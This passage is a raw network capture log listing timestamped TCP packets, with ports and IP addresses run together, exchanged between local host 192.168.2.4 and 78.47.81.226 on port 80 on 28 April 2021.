                                                                                                                                          Apr 28, 2021 22:58:43.339998007 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340015888 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340034008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340035915 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340049982 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340050936 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340066910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340082884 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340084076 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340100050 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340111971 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340117931 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340126038 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340140104 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340157986 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340173960 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340172052 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340190887 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340205908 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340207100 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340219975 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340223074 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340240002 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340255976 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340276003 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340277910 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340292931 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340292931 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340310097 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.340312004 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340336084 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.340368032 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407423019 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407450914 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407474995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407499075 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407522917 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407546043 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407552958 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407568932 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407587051 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407592058 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407620907 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407625914 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407646894 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407658100 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407670021 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407695055 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407706022 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407717943 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407741070 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407746077 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407763958 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407777071 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407785892 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407814026 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407815933 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407840967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407850027 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407864094 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407874107 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407886982 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407900095 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407912016 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407922983 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407933950 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407948971 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407955885 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.407979012 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.407979965 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408009052 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408014059 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408034086 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408056974 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408061028 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408080101 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408102036 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408104897 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408124924 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408133984 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408148050 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408174038 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408176899 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408202887 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408216000 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408229113 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408231020 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408257961 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408267021 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408281088 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408304930 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408308029 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408328056 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408343077 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408349991 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408371925 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408380985 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408399105 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408423901 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408427954 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408447027 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408448935 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408469915 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408484936 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408492088 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408514023 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408523083 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408535957 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408557892 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408566952 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408586025 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408605099 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408611059 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408633947 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408634901 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408655882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408678055 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408679008 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408700943 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408714056 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408725023 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408746004 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408755064 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408775091 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408797026 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408799887 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408822060 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408822060 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408843994 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408859968 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408866882 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408888102 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408896923 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408910990 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408932924 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408942938 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.408961058 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.408986092 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409008026 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409018993 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.409030914 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409053087 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409054041 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.409075022 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409079075 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.409097910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409120083 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409147024 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409172058 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.409209013 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.409218073 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.409293890 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.478813887 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478846073 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478863001 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478878975 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478900909 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478918076 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478936911 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478949070 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.478955030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478972912 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.478990078 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479007006 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479016066 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479023933 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479049921 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479048967 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479069948 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479078054 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479083061 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479095936 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479114056 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479124069 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479132891 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479149103 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479159117 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479170084 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479183912 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479183912 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479203939 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479216099 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479222059 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479240894 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479247093 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479255915 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479265928 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479274988 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479284048 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479300022 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479302883 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479321957 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479332924 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479338884 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479357004 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479357004 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479374886 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479382992 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479393005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479409933 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479418993 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479423046 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479434967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479456902 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479466915 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479476929 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479480028 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479490995 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479507923 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479511023 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479525089 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479537964 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479549885 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479553938 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479568005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479579926 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479583979 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479602098 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479604006 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479614973 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479631901 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479633093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479645967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479662895 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479665995 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479679108 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479696035 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479696989 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479712009 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479720116 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479734898 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479753017 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479769945 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479774952 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479787111 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479789972 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479804039 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479820967 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479821920 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479837894 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479856014 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479868889 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479882002 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479893923 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479896069 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479899883 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479907036 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479921103 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479938030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479952097 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.479954004 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479969978 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479985952 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.479990005 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480005026 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480021000 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480030060 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480038881 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480050087 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480056047 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480072021 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480081081 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480094910 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480113983 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480114937 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480130911 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480138063 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480148077 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480165005 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480179071 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480181932 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480199099 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480211020 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480211973 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480230093 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480252981 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480266094 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480271101 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480289936 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480310917 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480312109 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480334044 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480339050 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480360985 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480376959 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480385065 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480406046 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480408907 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480428934 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480437994 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480444908 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480458975 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480473042 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480483055 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480508089 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480535030 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480557919 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480580091 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480586052 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480602980 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480618954 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480623960 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480643988 CEST4973580192.168.2.478.47.81.226
                                                                                                                                          Apr 28, 2021 22:58:43.480645895 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480671883 CEST804973578.47.81.226192.168.2.4
                                                                                                                                          Apr 28, 2021 22:58:43.480671883 CEST4973580192.168.2.478.47.81.226
